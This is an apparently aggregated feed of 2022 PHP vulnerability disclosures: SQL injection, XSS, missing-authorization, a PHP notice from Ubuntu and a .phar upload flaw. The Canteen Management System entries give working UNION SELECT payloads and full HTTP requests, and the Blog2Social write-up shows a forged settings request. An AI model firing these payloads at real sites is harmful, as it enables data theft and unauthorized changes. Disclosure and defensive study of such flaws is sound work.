Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /youthappam/editclient.php.

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: songyangqi

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/editclient.php

Vulnerability location: /youthappam/editclient.php, id

dbname =youthappam,length=10

\[+\] Payload: /youthappam/editclient.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8--+ // Leak place ---> id

GET /youthappam/editclient.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close

CVE-2022-43291: bug_report/SQLi-2.md at main · songyangqi/bug_report

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /youthappam/editcategory.php.

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: songyangqi

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/editcategory.php

Vulnerability location: /youthappam/editcategory.php, id

dbname =youthappam,length=10

\[+\] Payload: /youthappam/editcategory.php?id=-1%27%20union%20select%201,database(),3,4--+ // Leak place ---> id

GET /youthappam/editcategory.php?id\=\-1%27%20union%20select%201,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close

CVE-2022-43290: bug_report/SQLi-1.md at main · songyangqi/bug_report

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /youthappam/editfood.php.

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: songyangqi

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/editfood.php

Vulnerability location: /youthappam/editfood.php, id

dbname =youthappam,length=10

\[+\] Payload: /youthappam/editfood.php?id=-1' union select 1,database(),3,4,5,6,7,8,9--+ // Leak place ---> id

GET /youthappam/editfood.php?id\=\-1' union select 1,database(),3,4,5,6,7,8,9--+ HTTP/1.1
Host: 192.168.1.88
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close

CVE-2022-43292: bug_report/SQLi-3.md at main · songyangqi/bug_report

Shopwind v3.4.3 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the component /common/library/Page.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-43321: Reflected-XSS vulnerabilities via '/common/library/Page.php' · Issue #1 · shopwind/yii-shopwind

FeehiCMS v2.1.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the id parameter at /web/admin/index.php?r=log%2Fview-layer.

CVE-2022-43320: View log details Reflected-XSS vulnerabilities in the background. · Issue #4 · liufee/feehicms

WordPress Blog2Social versions 6.9.11 and below suffer from a missing authorization vulnerability.

Description: Missing Authorization to Authenticated (Subscriber+) Settings Update

Affected Plugin: Blog2Social

Plugin Slug: blog2social

Affected Versions: <= 6.9.11

CVE ID: CVE-2022-3622

CVSS Score: 4.7 (Medium)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Researcher/s: Marco Wotschka

Fully Patched Version: 6.9.12

Blog2Social: Social Media Auto Post & Scheduler is a plugin offered by Blog2Social/Adenion that provides content-creators with the ability to quickly share site content to their social media accounts. It offers automatic post sharing as well as optimized scheduling and also extends some of its features to subscribers, enabling them to share posts to their own social media accounts.

As part of the plugin’s functionality, there are some more advanced settings that can be managed. Unfortunately, this was implemented insecurely making it possible for authenticated attackers to update these settings even without the authorization to do so.

More specifically, the plugin provides administrators with the ability to enable legacy mode, which is intended to reduce server load. In legacy mode, the plugin will load content one item at a time instead of loading all content in bulk in an attempt to reduce the likelihood of dashboard freeze-ups. In order to reduce the number of concurrent outgoing connections, legacy mode will also load connections to social media accounts in sequential order as opposed to doing so simultaneously. While functionality should not be significantly affected by this for most use cases, this legacy option setting is reserved for administrators only. Unfortunately, due to a lack of capability checking on the function and in the user interface, site subscribers had access to this setting via the dashboard:

/wp-admin/admin.php?page=blog2social-settings

Furthermore, the same URL offers access to a Social Meta Data tab, which contains forms that are disabled for non-administrative users. However, browsers offer inspector tools, which can be used to modify html on the fly in order to change properties of such forms and their elements. For instance, a save button with the following properties can be modified to become functional by removing the disabled attribute from the button:

<button class="btn btn-primary pull-right" disabled="disabled" type="submit">save</button> – as a result, such a form can be submitted by a subscriber. This indicates the developer used client-side validation, which can easily be bypassed by modifying the request sent to the server.

A request could be submitted using a third party tool similar to this one:

POST /wp-admin/admin-ajax.php HTTP/1.1

Host: 127.0.0.1

Cookie:

b2s_og_default_title=SiteTitle&b2s_og_default_desc=Just%20another%20WordPress%20site&b2s_og_default_image=&b2s_og_imagedata_active=1&b2s_og_objecttype_active=1&b2s_og_locale_active=1&b2s_og_locale=en_US&b2s_card_default_type=Summary&b2s_card_default_title=SiteTitle&b2s_card_default_desc=Just%20another%20WordPress%20site&b2s_card_default_image=&is_admin=1&version=0&action=b2s_save_social_meta_tags&b2s_security_nonce=<nonce>

This had consequences such as allowing subscribers to change social meta tags which could potentially be used to impact brand reputation.

A third issue that we discovered surrounded the plugin’s general authorization mechanism.

[Please view this code snippet on our blog here.] (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VWydX-1ZpVtDW5m3pbH5yxlc9W2C4PM94S6TLRN1sYgXV5mNXrV3Zsc37CgPpPW1_8BsQ650vs3W86NLQQ1Cb22gW8qlQJx717QmtN2Cx03MLNfRLW2-JNJb7nLtJDW6WM7R34PtmhMW1Q6y_X7lS_zWVjVDs36QWQxhVzcJwS8zW-6JW8R8sdQ5n8VyMW3xQZRx311bNnW52MK5T99M-WqN2bB3jwTbxZzW1VZPJL4W2QZ5W1sVXxZ2kr-JTTbvjx4xd9hxN1FlKQT1fwwDW7k9F6p6vRy5QVbh2jM4ll2JJW999K9x38XkPRW6ZTcyY2C85K-W5CC1TG1747mhW7gFskm1Y2Zy8W1f8khN7hdTbPVNS67c54W0xjW19nHJ55SGL4QW4BD90m6r6kRYW90HD6J3JT--YW9cg9wz21JSczW3tFWZp50-1qtW8wjp8m8gL9xyW7JNDB-5x1VB83f5z1 )

The first if-statement is intended to prevent unauthorized use of this function and similar functions using the same protection. The following parts need to evaluate to true in order for the if-statement to do the same:

- current_user_can('read') – This gives access to the administration screens and user profiles. This permission is generally available to all authenticated users such as subscribers.  
- isset($_POST['b2s_security_nonce']) – this nonce is set by the plugin and can be obtained by searching the code of /wp-admin/profile.php for the string ‘b2s_security_nonce’. This nonce is generated for subscribers and higher.  
- (int) wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['b2s_security_nonce'])), 'b2s_security_nonce') > 0 – this verifies the nonce after some sanitization.

As long as a userId is provided, we are able to lock B2S_LOCK_AUTO_POST_IMPORT_ for any user, resulting in that user being unable to automatically import posts. We found that many other functions lacked proper capability checks as well.

The Importance of Capability Checks

Capability checks are an important part of securing AJAX actions since those are available to any logged in users, including subscribers. The following is an example of an AJAX action from the Blog2Social plugin.

add_action('wp_ajax_b2s_lock_auto_post_import', array($this, 'lockAutoPostImport'));

While nonce checks ensure that the user initiating the request intended to do so, they don’t provide authorization. As mentioned above, the check current_user_can('read') does ensure that the user initiating the request has that specific capability, but it does not suffice to protect actions intended for administrators only. A proper way to secure such actions would be to utilize a check such as

current_user_can('manage_options').

The plugin does make use of B2S_PLUGIN_BLOG_USER_ID, which determines the current user’s ID in order to ensure that options saved are personalized thus preventing overwriting other users’ preferences:

define('B2S_PLUGIN_BLOG_USER_ID', get_current_user_id());

Timeline

October 1, 2022 – Initial outreach to the plugin developer.

October 5, 2022 – We disclosed details of the vulnerabilities with the developer.

October 6, 2022 – Version 6.9.11 is released which provides a patch for the legacy mode update vulnerability.

October 10, 2022 – The remaining authorization vulnerabilities are patched in version 6.9.12.

October 27, 2022 – Wordfence Premium, Care, and Response customers receive a firewall rule to provide additional protection.

November 26, 2022 – Wordfence Free users receive a firewall rule.

Conclusion

In today’s post, we covered several vulnerabilities in the Blog2Social: Social Media Auto Post & Scheduler plugin that could be used by subscribers to update plugin settings due to improper authorization checks. The vulnerabilities were patched by ensuring that capabilities were checked.

Wordfence Premium, Care, and Response users received a firewall rule on October 27th, 2022 for enhanced protection. Wordfence free users will receive this rule after 30 days on November 26th, 2022. We strongly recommend updating to version 6.9.12 or higher of Blog2Social: Social Media Auto Post & Scheduler to ensure that your site is protected against any exploits targeting this vulnerability.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care.  If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance. If you have any friends or colleagues who are using this plugin, please share this announcement with them and encourage them to update to the latest patched version of Blog2Social as soon as possible.

WordPress Blog2Social 6.9.11 Missing Authorization

Ubuntu Security Notice 5717-1 - It was discovered that PHP incorrectly handled certain gzip files. An attacker could possibly use this issue to cause a denial of service. It was discovered that PHP incorrectly handled certain cookies. An attacker could possibly use this issue to compromise the data It was discovered that PHP incorrectly handled certain image fonts. An attacker could possibly use this issue to expose sensitive information. This issue only affected Ubuntu 20.04 LTS, Ubuntu 22.10, and Ubuntu 22.04 LTS.

=========================================================================  
Ubuntu Security Notice USN-5717-1  
November 08, 2022

php7.2, php7.4, php8.1 vulnerabilities  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in PHP.

Software Description:  
- php8.1: HTML-embedded scripting language interpreter  
- php7.4: HTML-embedded scripting language interpreter  
- php7.2: HTML-embedded scripting language interpreter

Details:

It was discovered that PHP incorrectly handled certain gzip files.  
An attacker could possibly use this issue to cause a denial of service.  
(CVE-2022-31628)

It was discovered that PHP incorrectly handled certain cookies.  
An attacker could possibly use this issue to compromise the data  
(CVE-2022-31629)

It was discovered that PHP incorrectly handled certain image fonts.  
An attacker could possibly use this issue to expose sensitive information.  
This issue only affected Ubuntu 20.04 LTS, Ubuntu 22.10, and Ubuntu 22.04 LTS.  
(CVE-2022-31630)

Nicky Mouha discovered that PHP incorrectly handled certain SHA-3 operations.  
An attacker could possibly use this issue to cause a crash  
or execute arbitrary code. This issue only affected Ubuntu 20.04 LTS,  
Ubuntu 22.10, and Ubuntu 22.04 LTS. (CVE-2022-37454)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
  libapache2-mod-php7.4           8.1.7-1ubuntu3.1  
  libapache2-mod-php8.0           8.1.7-1ubuntu3.1  
  libapache2-mod-php8.1           8.1.7-1ubuntu3.1  
  php8.1                          8.1.7-1ubuntu3.1  
  php8.1-cgi                      8.1.7-1ubuntu3.1  
  php8.1-cli                      8.1.7-1ubuntu3.1  
  php8.1-zip                      8.1.7-1ubuntu3.1

Ubuntu 22.04 LTS:  
  libapache2-mod-php7.4           8.1.2-1ubuntu2.8  
  libapache2-mod-php8.0           8.1.2-1ubuntu2.8  
  libapache2-mod-php8.1           8.1.2-1ubuntu2.8  
  php8.1                          8.1.2-1ubuntu2.8  
  php8.1-cgi                      8.1.2-1ubuntu2.8  
  php8.1-cli                      8.1.2-1ubuntu2.8  
  php8.1-zip                      8.1.2-1ubuntu2.8

Ubuntu 20.04 LTS:  
  libapache2-mod-php7.4           7.4.3-4ubuntu2.15  
  php7.4                          7.4.3-4ubuntu2.15  
  php7.4-cgi                      7.4.3-4ubuntu2.15  
  php7.4-cli                      7.4.3-4ubuntu2.15  
  php7.4-zip                      7.4.3-4ubuntu2.15

Ubuntu 18.04 LTS:  
  libapache2-mod-php7.2           7.2.24-0ubuntu0.18.04.15  
  php7.2                          7.2.24-0ubuntu0.18.04.15  
  php7.2-cgi                      7.2.24-0ubuntu0.18.04.15  
  php7.2-cli                      7.2.24-0ubuntu0.18.04.15  
  php7.2-zip                      7.2.24-0ubuntu0.18.04.15

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5717-1  
  CVE-2022-31628, CVE-2022-31629, CVE-2022-31630, CVE-2022-37454

Package Information:  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.7-1ubuntu3.1  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.8  
  https://launchpad.net/ubuntu/+source/php7.4/7.4.3-4ubuntu2.15  
  https://launchpad.net/ubuntu/+source/php7.2/7.2.24-0ubuntu0.18.04.15

Ubuntu Security Notice USN-5717-1

Roxy Fileman 1.4.6 allows Remote Code Execution via a .phar upload, because the default FORBIDDEN_UPLOADS value in conf.json only blocks .php, .php4, and .php5 files. (Visiting any .phar file invokes the PHP interpreter in some realistic web-server configurations.)

The default file extension configuration has been changed to add .phar and... · dc253886

Ondrej Sury authored May 04, 2017

The default file extension configuration has been changed to add .phar and remove (some) obsolete extensions

CVE-2022-40797: debian/php-cgi.conf · dc253886b5b2e9bc8d9e36db787abb083a667fd8 · Debian PHP Team / php · GitLab

A cross-site scripting (XSS) vulnerability in Canteen Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.

**CVE-2022-43144 : Stored-XSS****Description**

A cross-site scripting (XSS) vulnerability in Canteen Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.

**Impact**

*   Allowing an attacker to hijack the user's session and take over the account.
*   To exploit this vulnerability victim must visit the page where the XXS payload is stored.

**Affected Application link**

*   https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html
*   https://www.sourcecodester.com/download-code?nid=15688&title=Canteen+Management+System+Project+Source+Code+in+PHP+Free+Download

**Proof of concept**

Once the application is up and running we can log in.

We have "Add Invoice" feature with in the application.

we can add an invoice and check our entries are made available on the "manage Invoice page".

Let's add an invoice with a special characters in the contact field.

The application does not perform any encoding of special characters provided by the user.

let's analyze the source and understand how the application is handling provided data.

It is clear that the application doesn't perform data validation and trust user-supplied data, we can use the below XSS payload as input which may be stored in the application.

Let's analyze the source too if there is any data validation in place while storing the data.

The entry provided was added to the database.

We can successfully execute the javascript payload indicating the application is vulnerable to XXS.

CVE-2022-43144: GitHub - mudassiruddin/CVE-2022-43144-Stored-XSS: PoC to exploit CVE-2022-43144

Insecure direct object references (IDOR) vulnerability in the wpForo Forum plugin <= 2.0.5 on WordPress allows attackers with subscriber or higher user roles to mark any forum post as private/public.

Tag

#php